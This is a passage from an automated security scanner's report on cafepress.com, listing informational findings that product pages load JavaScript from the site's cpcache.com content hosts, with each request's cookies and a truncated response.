HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 112197 Date: Sun, 26 Dec 2010 13:47:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.64. http://www.cafepress.com/make/custom-thermos
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-thermos
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 55367 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.65. http://www.cafepress.com/make/custom-water-bottles
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-water-bottles
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/js/makedepts.js
http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 58794 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </style><script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.66. http://www.cafepress.com/make/holiday-invitations
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-invitations
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/holiday-invitations HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 55521 Date: Sun, 26 Dec 2010 13:47:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55521 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.67. http://www.cafepress.com/make/holiday-photo-cards
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/holiday-photo-cards
Issue detail
The response dynamically includes the following script from another domain:
http://content0.cpcache.com/js/hoverIntent.minified.js
Request
GET /make/holiday-photo-cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 58720 Date: Sun, 26 Dec 2010 13:47:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58720 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
5.68. http://www.cafepress.com/make/personalized-gifts
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-gifts
Issue detail
The response dynamically includes the following scripts from other domains: http://content0.cpcache.com/js/hoverIntent.minified.js http://content8.cpcache.com/make/js/tracking-a.js
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71867 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://content8.cpcache.com/make/js/tracking-a.js"> </script>...[SNIP]...
5.69. http://www.cafepress.com/make/personalized-ornaments
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-ornaments
Issue detail
The response dynamically includes the following scripts from other domains: http://content0.cpcache.com/js/hoverIntent.minified.js http://content4.cpcache.com/js/makedepts.js http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 54240 Date: Sun, 26 Dec 2010 13:47:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54240 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <![endif]--> <script type="text/javascript" src="http://content4.cpcache.com/js/makedepts.js"> </script>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://content6.cpcache.com/js/jquery/themes/make-theme/jquery.ui.all.css"><script type="text/javascript" src="http://content7.cpcache.com/make/js/bulk-pricing/jquery.bulkpricingdialog.js"> </script>...[SNIP]...
5.70. http://www.cafepress.com/sk/TheGamingApe
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The response dynamically includes the following scripts from other domains: http://content0.cpcache.com/js/hoverIntent.minified.js http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4 http://content6.cpcache.com/js/jquery/jcarousel/lib/jquery.jcarousel.js http://content7.cpcache.com/marketplace/js/sarissa_ieemu_xpath.js http://content9.cpcache.com/marketplace/js/sarissa.js
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 